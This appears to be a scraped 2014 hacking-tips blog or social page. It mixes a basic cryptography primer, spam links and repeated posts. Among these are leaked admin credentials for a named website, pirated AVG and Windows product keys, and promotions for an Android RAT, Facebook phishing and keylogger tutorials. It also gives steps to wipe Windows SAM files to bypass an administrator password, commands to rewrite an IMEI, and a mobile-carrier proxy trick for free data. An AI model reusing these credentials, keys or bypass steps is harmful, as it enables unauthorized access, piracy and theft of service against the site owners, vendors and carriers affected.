Introduction to security and ethical hacking-part 4 In this session,we will learn about cryptographic fundamentals ... ------------------------------------------------------------------------------------- CRYPTOGRAPHIC FUNDAMENTALS:- cryptography is the science of hiding or encrypting information.The practice of cryptography is very old and has been evolving since ancient times.cryptography is a powerful and complex mechanism to maintain computer security.Modern communications and computing use cryptography extensively to protect sensitive information and communications from unauthorized access. There are many cryptographic techniques that can accomplish the goals of the CIA triad.Encryption is a cryptographic technique that converts data from plain or cleartext form,into coded or 𝗰𝗶𝗽𝗵𝗲𝗿𝘁𝗲𝘅𝘁 𝗳𝗼𝗿𝗺(meaning mentioned below).only authorized recipients with the necessary decryption information can decode and read the data. 𝗰𝗶𝗽𝗵𝗲𝗿𝘁𝗲𝘅𝘁:𝒜 𝒸𝒾𝓅𝒽ℯ𝓇 𝒾𝓈 𝒶 𝓈𝓅ℯ𝒸𝒾𝒻𝒾𝒸 𝓈ℯ𝓉 ℴ𝒻 𝒶𝒸𝓉𝒾ℴ𝓃𝓈 𝓊𝓈ℯ𝒹 𝓉ℴ ℯ𝓃𝒸𝓇𝓎𝓅𝓉 𝒹𝒶𝓉𝒶.𝒫𝓁𝒶𝒾𝓃𝓉ℯ𝓍𝓉 𝒾𝓈 𝓉𝒽ℯ ℴ𝓇𝒾ℊ𝒾𝓃𝒶𝓁,𝓊𝓃-ℯ𝓃𝒸ℴ𝒹ℯ𝒹 𝒹𝒶𝓉𝒶.𝒪𝓃𝒸ℯ 𝓉𝒽ℯ 𝒸𝒾𝓅𝒽ℯ𝓇 𝒾𝓈 𝒶𝓅𝓅𝓁𝒾ℯ𝒹 𝓉ℴ 𝓉𝒽ℯ 𝓅𝓁𝒶𝒾𝓃𝓉ℯ𝓍𝓉,𝓉𝒽ℯ ℴ𝒷𝓈𝓊𝓇ℯ𝒹 𝒹𝒶𝓉𝒶 𝒾𝓈 𝓀𝓃ℴ𝓌 𝒶𝓈 𝒞ℐ𝒫ℋℰℛ 𝒯ℰ𝒳𝒯.𝒯𝒽ℯ 𝓇ℯ𝓋ℯ𝓇𝓈ℯ 𝓅𝓇ℴ𝒸ℯ𝓈𝓈 ℴ𝒻 𝓉𝓇𝒶𝓃𝓈𝓁𝒶𝓉𝒾𝓃ℊ 𝒸𝒾𝓅𝒽ℯ𝓇 𝓉ℯ𝓍𝓉 𝓉ℴ 𝒸𝓁ℯ𝒶𝓇 𝓉ℯ𝓍𝓉 𝒾𝓈 𝓀𝓃ℴ𝓌 𝒶𝓈 𝒹ℯ𝒸𝒾𝓅𝒽ℯ𝓇𝒾𝓃ℊ. Encryption may involves use of keys.A key is a specific piece of information that is used to perform encryption and decryption.The longer the key,the stronger the encryption.encryption can be performed by using public and private keys.The private key is never shared and is kept secret by one party during two way encryption. the public key can be given to anyone.Only the public key in a pair can decrypt data encoded with the corresponding private key,and only the private key in a pair can decrypt data encoded with the corresponding public key. it is becoming more common to encrypt many forms of communications and data streams,as well as entire hard disks.some operating systems support whole disk encryption and there are many tools that are capable of encrypting all or part of the data on a disk or drive. tomorrow i gonna post again part1,part2,part3 and part4 for those who missed .... come back Monday(22-Dec:6pm) to know about certificate-Based security ...kindly like share and comment....

How to Get Traffic For Your Website - YouTube

How to Get Traffic For Your Website - YouTube

http://youtu.be/X6hX3q3fWOI
You can Take Your Website Unlimited traffic via this system. http://www.websyndic.com in this Site You can get traffic. For any help Visithttp://www.websyndic.com .

AVG 2015 With Serial Key

 

>>AVG 2015 With Serial Key << AVG has launched AVG 2015and this version is really good one with a new user interface and improved performance. Since the day I recommend everyone to use it. AVG 2015 has the following main components: Antivirus and antispyware Anti-Rootkit Web-based protection Surf-Shield Web Scanner Online Shield Privacy Policy Identity Alert Email Scanner Anti-Spam Personal firewall PC Analyzer Data Warehouse Additional components Components of AVG Internet Security 2015 "Computer Protection" provides full protection for your computer against internal threats, which is useful if you are currently not connected to the network. It detects all known types of viruses and spyware, including dormant threat (which entered into the system, but still inactive), and rootkits. • Antivirus and antispyware Anti-Virus component ensures continuous protection for your computer in real time. It scans each file when you open, save, or copy and protects the system areas of your computer. • Protection against rootkits Component Anti-Rootkit - a special tool designed to detect and remove rootkits. To scan your computer for rootkits, click Scan for rootkits. Rootkit scan is also performed by default when using the Scan whole computer and pre-scheduled scanning option. • Data Warehouse AVG Data Warehouse component allows you to create secure virtual storage for valuable and confidential data. Content Repository data is encrypted and protected by a password you specify, thus preventing unauthorized access. Web protection on the Internet Components of AVG Internet Security "Protection while browsing the site" provides full protection for your computer on the Internet. It detects all known types of viruses and spyware, as well as such complex threats such as exploits and malicious websites. • Surf-Shield Module Surf-Shield component LinkScanner protects you when using the Internet. It detects complex Internet threats, which include: - Web sites with exploits that use malicious code; - Phishing websites created for the illicit acquisition of personal information of users; - Compromised sites, ie. E. Initially serious and legitimate sites that have become dangerous and unpredictable as a result of a malicious attack. • Online Shield Component Online Shield protects you when using the Internet. It detects common types of viruses and spyware, protects you with one of the following methods. - Scan the contents of the web pages that you open before they will be displayed in a web browser. If the page contains dangerous objects java, Online Shield component stops opening page. Scanning of files that you are trying to download. If the file is infected, Online Shield immediately stops booting, the threat has not penetrated into the computer. Protection of personal data Components of AVG Internet Security "Personal information" protects your computer by monitoring running applications and processes and tracking all potentially dangerous activity. He also regularly checks that your personal data will not become the object of misuse of the Internet. • Identity Protection Component Identity Protection protects your computer in real time against new and unknown threats. It keeps track of all the processes (including hidden) and more than 285 models of behavior, trying to identify the possible risk to the system. For this reason, detection of threats may not even described in the virus database. • Identity Alert Identity Alert component provides access to the web service, designed for discrete monitoring of personal information over the Internet. Such information includes the following information: - Credit card number; - E-mail address; - Phone number (mobile). Network Threat Protection • Personal firewall Component of AVG Firewall (Firewall) in AVG Internet Security controls all network traffic on your computer. Depending on the settings it allows or blocks attempts to connect to the network, as well as send and receive any kind of data at all scales, from small local networks to the entire Internet. A properly configured AVG Firewall component will provide excellent protection against hacker attacks from the Internet. E-mail Security Components of AVG Internet Security "email security" provides a complete e-mail protection from viruses, spyware and spam. For more see >>COMMENTS << AVG 2015 Download >> https://adf.ly/CZyMh << Serial Key For AVG 2015 1) 8MEH-RF3MY-BZ7CJ-9LUAR-ST99N-CEMBR-ACED 2) 8MEH-RGM33-K474L-6FGRR-8RR7K-UEMBR-ACED 3) 8MEH-RJXR4-2CKYP-2GB3A-DBMAD-PEMBR-ACED 4) 8MEH-RMXLW-HN44A-BABPA-S9NQF-PEMBR-ACED 5) 8MEH-RNZLL-2Y4QX-79PPA-MMOKE-AEMBR-ACED 6) 8MEH-RREY3-L2LQA-LUMOR-UDTZ4-6EMBR-ACED 7) 8MEH-RREY3-L2LQA-LUMOR-UJXN3-6EMBR-ACED 8) 8MEH-RW2ZU-29S4F-26QCR-WT482-BEMBR-ACED Enjoy

Tip: Set aside 30 Minutes/Day to improve your brain function. Treat your brain like a muscle - work it out! 10+ Ways to Improve Critical Thinking Skills: http://www.wikihow.com/Improve-Critical-Thinking-Skills

 

Tip: Set aside 30 Minutes/Day to improve your brain function. Treat your brain like a muscle - work it out! 10+ Ways to Improve Critical Thinking Skills: http://www.wikihow.com/Improve-Critical-Thinking-Skills

Saturday, December 20, 2014

GLASSWIRE A NEW ANTI VIRUS SOFTWARE TO PROTECT YOUR SELF FROM HACKERS..

 

GLASSWIRE A NEW ANTI VIRUS SOFTWARE TO PROTECT YOUR SELF FROM HACKERS.... ////////////////////////////////////////////////////////////////////////////////////////////////////////// Download Now.... https://www.glasswire.com/ What is GlassWire ? GlassWire https://www.glasswire.com is new free firewall software for Windows that helps protect your computer from hackers by visualizing your network activity. The software isn’t an antivirus but instead it acts as additional protection that works with your current security suite. What is does and how it works? GlassWire works by visualizing all your network activity on an easy to understand graph. You can then filter your network activity by applications or traffic types. If you see an unknown spike on the graph you can click it to see what host and application caused the spike. GlassWire automatically resolves the IP address so it’s easier to figure out who or what your computer is communicating with. Hopefully it’s not a botnet! Will this software keep you safe from hackers and malware ? The software also has built in security features like ARP spoofing detection, unexpected DNS changes, network system file monitoring, suspicious host warnings and much more. If you see a connection that you don’t like GlassWire’s free firewall allows you to block the connection. GlassWire is only a few months old but it has already found malware https://blog.glasswire.com/…/…/glasswire-visualizes-malware/ that a GlassWire user’s antivirus couldn’t detect. GlassWire is still in beta and it does use a lot of memory in some cases for users who use applications with lots of network connections like Bittorrent but the GlassWire team says resource usage improvement is their top priority. Will GlassWire reduce my internet speed ? If you’re worried about using too much bandwidth GlassWire can help you figure out what apps or processes are wasting your bandwidth. You can also use the GlassWIre “Usage” tab to get an alert before you hit a certain amount of bandwidth from your computer if you have a limit with your ISP. GlassWire can only see the bandwidth on one device though and not your entire network. GlassWire can also monitor remote servers. It’s useful to watch your gaming or work servers to see what they are doing when you’re away. GlassWire’s network activity graph allows you to see your network activity up to 30 days in the past. How Can Glasswire be free ? Download GlassWire for free at https://www.glasswire.com but please remember it’s still in beta. The GlassWire team would appreciate your feedback so they can improve the software and make it more useful for everyone. Currently the software is free but they said they plan to have a paid version in the future with more features.

Shoebox + Magnifying Glass = Easy DIY Projector for your mobile phone! http://www.wikihow.com/Make-a-Movie-Projector Run, run as fast as you can! You can't catch me. I'm the Gingerbread Man! Make these classic, chewy, and spicy Gingerbread Men Cookies... with shorter legs: http://www.wikihow.com/Make-Gingerbread-Men-Cookies

 

Shoebox + Magnifying Glass = Easy DIY Projector for your mobile phone! http://www.wikihow.com/Make-a-Movie-Projector

 

Run, run as fast as you can! You can't catch me. I'm the Gingerbread Man! Make these classic, chewy, and spicy Gingerbread Men Cookies... with shorter legs: http://www.wikihow.com/Make-Gingerbread-Men-Cookies

Got you bro. How to Open Two Beer Bottles With Each Other: http://http//www.wikihow.com/Open-Two-Beer-Bottles-With-Each-Other

 

Got you bro. How to Open Two Beer Bottles With Each Other: http://http//www.wikihow.com/Open-Two-Beer-Bottles-With-Each-Other

Want to share your expertise or hobby? Practice your writing? Try Journaling in 2015? Dedicated Blogging may also offer earning potential! Day 20: Start a Blog ‪#‎newyears‬ ‪#‎resolutions‬ http://www.wikihow.com/Start-a-Blog

 

Want to share your expertise or hobby? Practice your writing? Try Journaling in 2015? Dedicated Blogging may also offer earning potential! Day 20: Start a Blog ‪#‎newyears‬ ‪#‎resolutions‬ http://www.wikihow.com/Start-a-Blog

Curious about Palm Reading? Here's a breakdown of Palm Line specifics! Read Palm Lines: http://www.wikihow.com/Read-Palm-Lines

 

Curious about Palm Reading? Here's a breakdown of Palm Line specifics! Read Palm Lines: http://www.wikihow.com/Read-Palm-Lines

Android RAT - AndroRAT Full Setup + Clean Download + Port Forwarding Like, share and subscribe https://www.youtube.com/watch?v=9DUNhWAdNII

 

Android RAT - AndroRAT Full Setup + Clean Download + Port Forwarding Like, share and subscribe https://www.youtube.com/watch?v=9DUNhWAdNII

Free Internet Tricks Here- http://sh.st/o0PSH All TyPes Of Facebook Hacking.. Phising,keylogger, And Website Hacking With Sql ,ddos Facebook Auto Likes With More than 1000 + likes O Go to http://sh.st/o0PSH

 

Free Internet Tricks Here- http://sh.st/o0PSH All TyPes Of Facebook Hacking.. Phising,keylogger, And Website Hacking With Sql ,ddos Facebook Auto Likes With More than 1000 + likes O Go to http://sh.st/o0PSH

Frndzz daikha jaye to har ki

(114) Facebook

Frndzz daikha jaye to har kisi ki yeh wish hoti hai k us ki pic py zaida sy zaida ‪#‎likes‬ hoon..... To aj main app logo ko auto likes ka trick btata hoon..... 1. Sb sy pahlay ap apni fb ki seting main ja kr apny ‪#‎followers‬ ko public kar do 2. Ab google main koi b liker site kholo main to ‪#‎vliker‬ nd ‪#‎myliker‬ use karta hoon 3. Ab waha aik option ho ga ‪#‎clickhere‬ waha click karo 4. Ab alow permission wala option aye ga waha click karo 5. Ab ok py click karo aur jb ‪#‎sucess‬ wala page aye to us ka ‪#‎url‬ copy kar lo 6. Ab back ao start walay page py jahan py sb sy pahly click kia tha 7. Ab us #url ko waha aik blank box main paste kar do 8. Ab new page open ho ga waha ‪#‎autoliker‬ py click karo 9. Ab new page open ho ga waha 4 option hoon gay ap ‪#‎photo‬ py click karo 10. Ab apni ‪#‎albm‬ kholo aur apni #photo py likes ‪#‎submit‬ karo 11. 250 likes ap k ho gay 12. Ab 15 mint bd isi method sy 250 aur ly lo.... Be happy........ Keep smiling.... .. :):):) ‪#‎UN_NOUMAN‬ ‪#‎TRICKMASTER‬

How To Change Facebook Login Screen Hey Guys

 

How To Change Facebook Login Screen Hey Guys , How Are You All What's Up Everything Is Cool , Here i'm Back With How To Change Your Facebook Login Screen When You Come To Facebook Login Page, Many of You Were Finding An Genuine Way To Get This , But As We Know That in Internet There Are Many Fake Software , Script Which Hack Our Account Or Block Our Account , But Now Leave This All And Your Search Ends Here http://www.hackinghobby.tk/…/how-to-change-facebook-login-s…

Top Ten Password Cracking Methods

 

---------------Top Ten Password Cracking Methods------------------- 1. Dictionary attack "This uses a simple file containing words that can, surprise surprise, be found in a dictionary. In other words, if you will excuse the pun, this attack uses exactly the kind of words that many people use as their password..." 2. Brute force attack "This method is similar to the dictionary attack but with the added bonus, for the hacker, of being able to detect non-dictionary words by working through all possible alpha-numeric combinations from aaa1 to zzz10..." 3. Rainbow table attack "A rainbow table is a list of pre-computed hashes - the numerical value of an encrypted password, used by most systems today - and that’s the hashes of all possible password combinations for any given hashing algorithm mind. The time it takes to crack a password using a rainbow table is reduced to the time it takes to look it up in the list..." 4. Phishing "There's an easy way to hack: ask the user for his or her password. A phishing email leads the unsuspecting reader to a faked online banking, payment or other site in order to login and put right some terrible problem with their security..." 5. Social engineering "A favourite of the social engineer is to telephone an office posing as an IT security tech guy and simply ask for the network access password. You’d be amazed how often this works..." 6. Malware "A key logger or screen scraper can be installed by malware which records everything you type or takes screen shots during a login process, and then forwards a copy of this file to hacker central..." 7. Offline cracking "Often the target in question has been compromised via an hack on a third party, which then provides access to the system servers and those all-important user password hash files. The password cracker can then take as long as they need to try and crack the code without alerting the target system or individual user..." 8. Shoulder surfing "The service personnel ‘uniform’ provides a kind of free pass to wander around unhindered, and make note of passwords being entered by genuine members of staff. It also provides an excellent opportunity to eyeball all those post-it notes stuck to the front of LCD screens with logins scribbled upon them..." 9. Spidering "Savvy hackers have realised that many corporate passwords are made up of words that are connected to the business itself. Studying corporate literature, website sales material and even the websites of competitors and listed customers can provide the ammunition to build a custom word list to use in a brute force attack..." 10. Guess "The password crackers best friend, of course, is the predictability of the user. Unless a truly random password has been created using software dedicated to the task, a user generated ‘random’ password is unlikely to be anything of the sort..." for more trick visit this site - http://www.hackinghobby.tk/

Friday, December 19, 2014

50 Surprising Facts About The Internet 1

 

50 Surprising Facts About The Internet 1. The term “surfing” the internet was coined in 1992 by an upstate New York librarian Jean Armour Polly, aka “Net Mom.” 2. The most played song on Spotify is “Wake Me Up” by Avicii. 3. The first tweet was sent on March 21, 2006 by Jack Dorsey: blogs.cio.com 4. Mark Zuckerberg’s original Facebook profile number ID is 4. 5. The first YouTube video was uploaded April 23, 2005. It’s called “Me at the zoo,” and features Jawed Karim, one of the founders, at the San Diego Zoo. youtube.com 6. A single Google query uses 1,000 computers in 0.2 seconds to retrieve an answer. 7. The original Space Jam website is still live. 8. So is the You’ve Got Mail site. 9. 16% to 20% of the searches Geoogle gets each day have never been Googled before. 10. Chinese social network Sina Weibo has 280.8 million users. 11. Twitter has 250 million users. 12. 500 milion tweets are sent ever day. 13. Tila Tequila had 1.5 million friends on Myspace. 14. The inventor of the modern world wide web, Tim Berners-Lee, was knighted by Queen Elizabeth. 15. Mr. Berners-Lee uploaded the first image to the internet. It is of a joke band of women from the nuclear research lab CERN. 16. The first website is still online. 17. The most commonly searched question beginning with “What is” in 2013 was “What is twerking?” 18. The most expensive keyword for Google AdWords is “insurance.” 19. The GIF format was invented by Steve Wilke, an engineer at Compuserve in 1987. 20. Mr. Wilhite maintains the correct pronunciation of the term is “jiff.” 21. He is clearly wrong. 50 Surprising Facts About The Internet 22. There are 191.3 million Tumblr blogs. 23.There are 83.1 billion Tumblr posts. 24.The most popular Tumblr is the official updates page for Minecraft. 25. Today, the Internet is 8,354 days old. Check HowOldIsTheInter.net to keep up to date. 26. “Gangnam Style” by Psy is still the most viewed YouTube video of all time. It’s been viewed over two billion times. youtube.com 27. The first email was sent in 1971 by Ray Tomlinson to himself. He doesn’t remember what it said. 28. The first spam email was sent in 1978 over ARPNET by a guy named Gary Thuerk. He was selling computers. 29. The first registered domain was symbolics.com. 30. The world record for the fastest time to log into a Gmail account is 1.16 seconds. 31. The world record for fastest texter is held by a Brazilian teenager. 32. This is what Google looked like in 2004: 33. 2.58 million people still pay for AOL. 34. It cost AOL over $300 million to mail all those CD-Roms back in the day. 35. At one point, AOL accounted for about 50% of all CD-Rom discs being made. 36. It took only 5 years for the internet to reach a market audience of 50 million users. 37. This is what Facebook looked like in 2004: 38. There were over 7 million Geocities sites before it was shut down in 2009. 39. Angelfire is still up. 40. Mark Zuckerberg had a pretty sweet Angelfire page. 41. One million babies have been born from people who met on Match.com. 42. Online daters spend an average of $243 per year on online dating. 44. 33% of female online daters have had sex on the first online date. 45. 10% of sex offenders use online dating. 46. The Amazon logo is indicating you can get everything from A to Z (look at the arrow): 47. Before the world wide web (the modern internet invented in 1989, people traded ASCII porn on the internet during the ’70s and ’80s. 48. We now spend more time browsing the web on mobile devices than desktop computers. 49. There is a subreddit devoted to chicken nuggets that look like other things. 50. This is the NeXT computer that Tim Berners-Lee used to create the World Wide Web:

Lost followers on Instagram and want to gain more? Try this: Get 1,000 Followers on Instagram: http://www.wikihow.com/Get-1k-Followers-on-Instagram

 

Lost followers on Instagram and want to gain more? Try this: Get 1,000 Followers on Instagram: http://www.wikihow.com/Get-1k-Followers-on-Instagram

A.o.a Wao # Wao ‪#‎Wao‬ Jazz FreeNe

 

A.o.a Wao # Wao ‪#‎Wao‬ Jazz FreeNet On Default Browser Symbian Java Android Users K Liye Gift. Dosto Aj Me Symbian Android Java Users K Liye Jazz Ka Default Browser Pe Free Net Ki Trix Laya Hon Jis Se Ap Downloading B Kar Sakty Hain. sab Se Pehly New "Access Point Bnaye" Conection Name=> internet APN=> JazzConnect.Mobilink World.Com Ab Advance Setting Me Jao ProxyServerAdress=> Hiload.org ya german-proxy.de Port Number=> 80 Ab Is Setting Ko Default Pe Save Karen, Ab Default Browser Pe Jayen Wahan Goto New Web Page Pe Jao Or 0.facebook.Com Visit Karen Ap K Pass 1 New Website( Hiload.org) Khul Jaye Gi Is Me Ap Jo Be site Likh K GO Pe Click Karen Ge Wo Khul Jaye Gi.Maslan Google.Com.Pk mobile9.com BlueApple.Mobi lekh kr go kardena. Enjoy The TriX With Downloading.

Sugar & Spice... makes everything nice! Make these divine Cinnamon Chocolate Dipped Strawberries. http://www.wikihow.com/Make-Cinnamon-Chocolate-Dipped-Straw…

 

Sugar & Spice... makes everything nice! Make these divine Cinnamon Chocolate Dipped Strawberries. http://www.wikihow.com/Make-Cinnamon-Chocolate-Dipped-Straw…

Leaked by IMH http://www.porta.pk/admin/ Username:admin Password:A;%EQ=rO+!Nm

 

Leaked by IMH http://www.porta.pk/admin/ Username:admin Password:A;%EQ=rO+!Nm

The Open Bay: Now Anyone Can Run A Pirate Bay ‘copy’

 

The Open Bay: Now Anyone Can Run A Pirate Bay ‘copy’ The Isohunt.to team have decided to give an early Christmas present to Pirate Bay fans. They've launched "The Open Bay," an initiative that allows anyone to put a 'copy' of The Pirate Bay online, minimal technical knowledge required. http://www.teamos-hkrg.com/…/the-open-bay-now-anyone-can-r…/

Get free .COM domain (Top Level Domain). Go Here: http://api.idhostinger.com/redir/5399152

 

Get free .COM domain (Top Level Domain). Go Here: http://api.idhostinger.com/redir/5399152

Hack facebook using phishing... very easy for Beginners.. https://www.youtube.com/watch?v=RXZNxnmnESQ

 

Hack facebook using phishing... very easy for Beginners.. https://www.youtube.com/watch?v=RXZNxnmnESQ

☠ Windows 10 Technical Preview Build 9888 [Leak]

 

☠ Windows 10 Technical Preview Build 9888 [Leak] ☠ ✍ What's new in Windows 10 build 9888 ✍ ⇨ Windows 10 Technical Preview build 9888 comes with several important improvements, including new animations for opening and closing windows. This particular tweak has been requested by many users out there, so it also serves as living proof that Microsoft is indeed listening to their feedback. At the same time, the PC settings screen is improved in Windows 10 build 9888 and now comes with a search box that allows users to quickly look for specific options. Last but not least, it also brings unified context menus on the desktop, but this particular feature is not yet completed, so you might also see the old menus across the operating system as well. Obviously, some other subtle changes could also be available, but we'll find more when Microsoft officially introduces this particular build for users. ✍ Direct Download Links ✍ ⇨ https://userscloud.com/xiwgyuxd8liu ⇨ http://dropmefiles.com/GmAgR ⇨ https://mega.co.nz/… ✍ Torrent Download Links ✍ ⇨ magnet:?xt=urn:btih:C6D441A27E586727A966C66E356875E2917B6A90&dn=MDL-ONLY-WINWORLD-JM1_CCSA_X64FRE_EN-US_DV5.iso.7z&tr=udp%3a%2f%2ftracker.openbittorrent.com%3a80&ws=http%3a%2f%2fwww67.uptobox.com%2fd%2f4qyv4majfcr76xkqke6mccjbpgkqbzvfs6r3nk4iw47lvxcc7bjqynms%2fMDL-ONLY-WINWORLD-JM1_CCSA_X64FRE_EN-US_DV5.iso.7z ✍ Installation Key ✍ ⇨ NKJFK-GPHP7-G8C3J-P6JXR-HQRJR

20+ Ways to Eliminate Body Odor http://www.wikihow.com/Eliminate-Body-Odor

 

20+ Ways to Eliminate Body Odor http://www.wikihow.com/Eliminate-Body-Odor

Thursday, December 18, 2014

Dripping nostalgia... Make Melted Crayon Art! http://www.wikihow.com/Make-Melted-Crayon-Art

 

Dripping nostalgia... Make Melted Crayon Art! http://www.wikihow.com/Make-Melted-Crayon-Art

Site:http://in-fa.site90.com Exploit:http://in-fa.site90.com/…/fil…/browser/default/browser.html… Enjoy ‪#‎Psychotic_Overlod‬ Here <<<<>>>>

Site:http://in-fa.site90.com Exploit:http://in-fa.site90.com/…/fil…/browser/default/browser.html… Enjoy ‪#‎Psychotic_Overlod‬ Here <<<<>>>>

Site:http://in-fa.site90.com Exploit:http://in-fa.site90.com/…/fil…/browser/default/browser.html… Enjoy ‪#‎Psychotic_Overlod‬ Here <<<<>>>>

Shows Phone information

 

1) *#*#4636#*#* - this code Shows Phone information, Battery information, Battery history and Usage statistics etc (2) *#*#8255#*#* - this code Show GTalk service monitor (3) *#*#1111#*#* -this code show Service Mode (4) *#*#232331#*#* -this code use s Bluetooth test (5) *#*#3264#*#* - this code show RAM version (6) *#*#0588#*#* - this code show Proximity sensor test (7) *#*#2664#*#* - this code show Touch screen test (8) *#*#0842#*#* - this code show Vibration test

About_Proxy_Server

 

************************‪#‎About_Proxy_Server‬*************************** Its allow for you to configure your browser to route your browser traffic through that machine, which then makes a request for a page on your behalf, and then sends you the results. These are usually used at no cost to the user. Since they are accessible to the public these are often quite slow. There are a variety of types of these proxy servers: * ‪#‎Transparent‬ Proxy - This type of proxy server identifies itself as a proxy server and also makes the original IP address available through the http headers. These are generally used for their ability to cache websites and do not effectively provide any anonymity to those who use them. However, the use of a transparent proxy will get you around simple IP bans. They are transparent in the terms that your IP address is exposed, not transparent in the terms that you do not know that you are using it (your system is not specifically configured to use it.) This type of proxy server does not hide your IP address. * ‪#‎Anonymous‬ Proxy - This type of proxy server identifies itself as a proxy server, but does not make the original IP address available. This type of proxy server is detectable, but provides reasonable anonymity for most users. This type of proxy server will hide your IP address. * ‪#‎Distorting‬ Proxy - This type of proxy server identifies itself as a proxy server, but make an incorrect original IP address available through the http headers. This type of proxy server will hide your IP address. * ‪#‎High‬ Anonymity Proxy - This type of proxy server does not identify itself as a proxy server and does not make available the original IP address. This type of proxy server will hide your IP address. ‪#‎Proxy‬ browser:- A proxy server acts as a security barrier between your internal network and the Internet, keeping others on the Internet from being able to obtain access to information that is located on your internal network.........and your browser is become like invisible........its hide your ip. like you use china country proxy den open google.com now google will open in china language form

Pinterest Tips for Bloggers – Use Pinterest To Promote Your Blogs and Sites http://www.thewindowsclub.com/pinterest-tips-for-bloggers

 

Pinterest Tips for Bloggers – Use Pinterest To Promote Your Blogs and Sites http://www.thewindowsclub.com/pinterest-tips-for-bloggers

3 Ways to Cook Portobello Mushrooms http://www.wikihow.com/Cook-Portobello-Mushrooms

3 Ways to Cook Portobello Mushrooms http://www.wikihow.com/Cook-Portobello-Mushrooms

3 Ways to Cook Portobello Mushrooms http://www.wikihow.com/Cook-Portobello-Mushrooms

http://www.pctricksguru.com/2014/12/how-to-change-your-caller-id-to-make.html

http://www.pctricksguru.com/2014/12/how-to-change-your-caller-id-to-make.html

"Delete ‪#‎administrator‬ Password" without any software Method

 

"Delete ‪#‎administrator‬ Password" without any software Method 1 Boot up with DOS and delete the sam.exe and sam.log files from Windows\system32\config in your hard drive. Now when you boot up in NT the password on your built-in administrator account which will be blank (i.e No password). This solution works only if your hard drive is FAT kind. Method 2 Step 1. Put your hard disk of your computer in any other pc . Step 2. Boot that computer and use your hard disk as a secondary hard disk (Don't boot as primary hard disk ). Step 3. Then open that drive in which the victim’s window(or your window) is installed. Step 4. Go to location windows->system32->config Step 5. And delete SAM.exe and SAM.log Step 6. Now remove hard disk and put in your computer. Step 7. And boot your computer.

>>How to Change /Restore IMEI no on Android phones and tablets.

 

>>How to Change /Restore IMEI no on Android phones and tablets. << BY ‪#‎THE_HJ‬ In case your IMEI no gets changed or you get an error saying Invalid IMEI no. Then there is no need to panic, you can easily get your IMEI no back. This is very rare error that rarely happens when installing a customized ROM. Before you begin you need to note down the IMEI number. There will be 2 IMEI number in case of a Dual Sim handset. You can find the IMEI number on the box pack and/or mentioned in the Battery Compartment. 1) Open the Dialer and type *#*#3646633#*#*you will enter the engineering mode. 2) Then swipe left to connectivity. In connectivity click the CDS information option and tap radio information and then tap phone 1. 3)Now enter the command AT EGMR=1,7,THE-FIRST-IMEI-NUMBER And press enter. For second SIM tap phone 2 and type this command AT EGMR=1,10,THE-SECOND-IMEI-NUMBER And press enter. If *#*#3646633#*#*does not work and if you are using a MediaTek powered handset you can download the utility called MTK Engineering Mode for free from Google Play, it will do the same.

http://anonhq.com/start-programming-approach-hacking/

Recently, we’ve been having requests and answers which needed a basic knowledge of programming languages to be fully understood.Sometimes starting studying programming languages can be seen as a long and tedious process, particularly when people discover hacking and try some tools for the first time. GUIs for hacking are everywhere nowadays, but their objective is to be PoC (Proof of concepts, see, there’s a whole dictionary behind every topic that you should know when starting studying it, hacking too, though I don’t know it all), to be something to show how easy hacking can be (not to be misunderstood with “hacking is easy”, better “see how easy hacking you is? Go and fix this”).So you basically can’t hack without programming knowledge, as you would just randomly press buttons and writing senseless commands. Once you start digging in the programming field, you’ll slowly fill those commands with sense, and you’ll be able to understand how the tools you use work. Algerian-hacker

 

You should never run programs that you don’t know how they work, especially in the hacking field, because you don’t know the consequences of a failed attack or of a successful but noisy one.

I wanted to apologize for any grammar error you might encounter, please let me know if you find any, I’m not mother tongue.

Interesting, So Programming Knowledge Is Important…

Yes! And, because I like lists, let me recap some of the most valuable reasons why programming is that important:

-First thing first, technology and Information Technology is considered the future, so programming (IMHO) is the key to understand the future by taking notions from the past (story of IT is fascinating too, I’m always amazed).

-Speaking about hacking without programming knowledge, it’s like building a house with only half of the ground floor. You can build one or two floors, then it will fall poorly, leaving you with rocks only. Being blind on this topic can cause you serious problems with law if something goes wrong, but more importantly you actually don’t know what you are doing.

-Sure you encounter errors sometimes, right? A better understanding of how computers work can give you the skill to solve problems without the constant help of someone else, not only in the IT field, but also in the pure logic one, as training your brain in always positive. And trust me, programming is the way to go.

-Using someone else’s tool is, quoting Cracker Hacker, “no fun”. This is actually true, what kind of satisfaction would you feel id you hacked something without even knowing how it happened? With programming knowledge you might be able to not only understand someone else’s code, but also program tools yourself, and once you understand the basic logic it’s not that hard.

-The vantages are infinite after all, just think about smartphone apps (iOS apps are written in C-objective btw), web applications, java running almost everywhere…

hacker

So Yeah, Where Do I Start From?

Wrong approach.

As long as we talk about following lessons, the only problem is that “so yeah” (but I think that readers don’t have this kind of behavior really), but learning programming is a need first of all. You write a program when another one misses a feature you need, or if there’s actually no tool that does what you want.

And the sad thing is that there’s no cookbook for it, no step by step how to solve errors. Sure problem solving is a natural skill (you’ll need it so much), but it’s directly generated by the will of doing what you are doing.

So, in case you didn’t understand it, last warning: this is in fact a long process and it is required. No cool tricks to show to friends allowed (newbies, don’t worry, just trying to scare unwilling people).

Formal Recomposition, May I Know Where to Start From?

Yes.
But keep in mind that I’m not a teacher neither I’m trying to be one.

School, courses or self-teaching doesn’t matter: find you own way, I’m just posting some start points suggested by me and other Null byte users. I’m personally studying it as with the self-teaching way, but if you are able to frequent a stable course, I recommend you to do it (waiting for experts thoughts…).

Understanding the basics of programming doesn’t take too long if you have an advanced knowledge about computers. The hard part is the experience building, and the time spent really depends on each person.

I wrote this article as an inspiration, because I want it to be a general topic about programming and ways to approach this world, as recently there has been a lot of confusion about explaining this to newbies, so if you have any correction or new resource you’d like to add, please participate and write it in the comments.I think that we should build a public of people where the most have this kind of knowledge, but there’s absolutely nothing to say about what Null Byte taught until now. I also take the occasion to thank this amazing community which is doing a very great job, especially in pointing newbies in the right direction, so thank you, everyday user of Null Byte.

Resources

I’m going to divide the resources in sections, for a better reading and documenting. future updates will be made for references posted in the comments that might deserve to be added.

General understanding

-Introduction to computer science and programming @ MitOpenCourseware (also linked on the main page): As the Video Lectures list shows, this is a very general though specialized introduction to computer science hosted by Mit. In my opinion this is very reliable and should out stand in this list. I’m quoting the description: “This subject is aimed at students with little or no programming experience. It aims to provide students with an understanding of the role computation can play in solving problems. It also aims to help students, regardless of their major, to feel justifiably confident of their ability to write small programs that allow them to accomplish useful goals. The class will use the Python™ programming language.” This course, as said, aims to provide students also with problem solving, which is one of the points I highlighted in the introduction. The programming language used is Python, one of the most common when talking about hacking.

